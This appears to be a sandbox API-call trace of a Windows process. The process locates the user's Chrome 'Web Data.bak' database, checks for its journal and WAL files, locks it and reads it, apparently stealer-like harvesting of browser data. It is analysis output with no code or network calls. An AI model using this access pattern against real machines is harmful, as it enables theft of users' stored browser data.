	[0219.079] VirtualFree (lpAddress=0x1660000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.080] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.080] ResetEvent (hEvent=0xc) returned 1
	[0219.080] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0219.088] ResetEvent (hEvent=0xc) returned 1
	[0219.088] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0219.104] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a448 | out: hHeap=0x370000) returned 1
	[0219.104] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a448
	[0219.104] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a528
	[0219.104] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a480
	[0219.104] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a560
	[0219.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.105] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1b5f290, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0219.105] lstrlenA (lpString="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 35
	[0219.105] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a07b0
	[0219.105] lstrlenA (lpString="\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 45
	[0219.105] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a1fb8
	[0219.105] VirtualAlloc (lpAddress=0x0, dwSize=0x1d0, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.105] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0219.105] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x520000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x530000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x4) returned 0x540000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x550000
	[0219.106] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.107] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000
	[0219.107] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000
	[0219.107] VirtualAlloc (lpAddress=0x0, dwSize=0x822, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.107] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.107] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.108] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x5e0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.108] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51
	[0219.108] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.108] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x54, lpBuffer=0x5f0000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpFilePart=0x0) returned 0x50
	[0219.108] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81
	[0219.108] VirtualAlloc (lpAddress=0x0, dwSize=0x51, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x5e0000, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpUsedDefaultChar=0x0) returned 81
	[0219.108] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.108] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.109] VirtualAlloc (lpAddress=0x0, dwSize=0x2f2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.109] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.109] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.109] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.109] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x5d0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), fInfoLevelId=0x0, lpFileInformation=0x1b5ee1c | out: lpFileInformation=0x1b5ee1c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64aa7ee0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x64aa7ee0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0xcc5c0240, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1
	[0219.109] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114
	[0219.109] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.110] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.110] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5ee60, dwLength=0x1c | out: lpBuffer=0x1b5ee60*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.110] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.110] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.110] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ef28, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1b5ef14, lpOverlapped=0x1b5eed8 | out: lpBuffer=0x1b5ef28*, lpNumberOfBytesRead=0x1b5ef14*=0x64, lpOverlapped=0x1b5eed8) returned 1
	[0219.111] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x1620000
	[0219.111] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5eeb8, dwLength=0x1c | out: lpBuffer=0x1b5eeb8*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.111] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1630000
	[0219.112] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1640000
	[0219.112] VirtualFree (lpAddress=0x1610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.112] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.112] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5eebc, dwLength=0x1c | out: lpBuffer=0x1b5eebc*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.112] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.112] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.112] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.113] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.113] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1650000
	[0219.113] VirtualAlloc (lpAddress=0x0, dwSize=0x1d4c0, flAllocationType=0x3000, flProtect=0x4) returned 0x1660000
	[0219.113] VirtualQuery (in: lpAddress=0x1660000, lpBuffer=0x1b5ef88, dwLength=0x1c | out: lpBuffer=0x1b5ef88*(BaseAddress=0x1660000, AllocationBase=0x1660000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.115] VirtualFree (lpAddress=0x5a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.116] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.116] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1680000
	[0219.116] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1690000
	[0219.117] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x16a0000
	[0219.117] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x16f0000
	[0219.117] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1700000
	[0219.117] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1710000
	[0219.117] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1720000
	[0219.118] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1730000
	[0219.118] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.118] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.118] VirtualQuery (in: lpAddress=0x1750000, lpBuffer=0x1b5d9c4, dwLength=0x1c | out: lpBuffer=0x1b5d9c4*(BaseAddress=0x1750000, AllocationBase=0x1750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.119] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.119] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.119] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e308 | out: lpOverlapped=0x1b5e308) returned 1
	[0219.119] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e2f4 | out: lpOverlapped=0x1b5e2f4) returned 1
	[0219.119] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e30c | out: lpOverlapped=0x1b5e30c) returned 1
	[0219.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.119] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.119] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e300 | out: lpFileInformation=0x1b5e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.119] GetLastError () returned 0x2
	[0219.119] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.120] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e330 | out: lpFileInformation=0x1b5e330*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.120] GetLastError () returned 0x2
	[0219.120] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.120] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5e34c | out: lpFileSizeHigh=0x1b5e34c*=0x0) returned 0x10000
	[0219.120] VirtualAlloc (lpAddress=0x0, dwSize=0xac80, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.120] VirtualQuery (in: lpAddress=0x1740000, lpBuffer=0x1b5e2d4, dwLength=0x1c | out: lpBuffer=0x1b5e2d4*(BaseAddress=0x1740000, AllocationBase=0x1740000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.121] ReadFile (in: hFile=0x114, lpBuffer=0x174a3e0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e32c, lpOverlapped=0x1b5e2f0 | out: lpBuffer=0x174a3e0*, lpNumberOfBytesRead=0x1b5e32c*=0x800, lpOverlapped=0x1b5e2f0) returned 1
	[0219.121] ReadFile (in: hFile=0x114, lpBuffer=0x1749b40, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e060, lpOverlapped=0x1b5e024 | out: lpBuffer=0x1749b40*, lpNumberOfBytesRead=0x1b5e060*=0x800, lpOverlapped=0x1b5e024) returned 1
	[0219.121] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.122] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1760000
	[0219.122] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1a80000
	[0219.122] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1a90000
	[0219.122] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.122] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.123] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.123] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1ad0000
	[0219.123] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ae0000
	[0219.123] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.124] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.124] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.124] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.124] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.124] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.125] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.125] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.125] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.125] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.125] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.126] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.126] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.126] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.126] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.126] VirtualQuery (in: lpAddress=0x1af0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x1af0000, AllocationBase=0x1af0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.127] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.127] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.127] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.127] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.127] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.128] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.128] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1b60000
	[0219.128] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.128] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.129] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.129] VirtualAlloc (lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x4) returned 0x1ba0000
	[0219.129] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1bb0000
	[0219.129] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
	[0219.130] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.130] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1bf0000
	[0219.130] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.131] VirtualFree (lpAddress=0x1bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.131] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.131] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.131] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.131] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.131] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.131] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.132] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.132] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1c10000
	[0219.132] VirtualFree (lpAddress=0x1c00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.132] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.133] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.133] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.133] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1c20000
	[0219.133] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.134] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.134] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d60000
	[0219.135] VirtualFree (lpAddress=0x1d50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.135] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.135] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.135] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.136] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.136] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.136] VirtualFree (lpAddress=0x1d70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.136] VirtualFree (lpAddress=0x1d50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.137] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.137] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.137] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.138] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.138] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000
	[0219.138] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.138] VirtualFree (lpAddress=0x1d90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.138] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.139] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.139] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.139] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
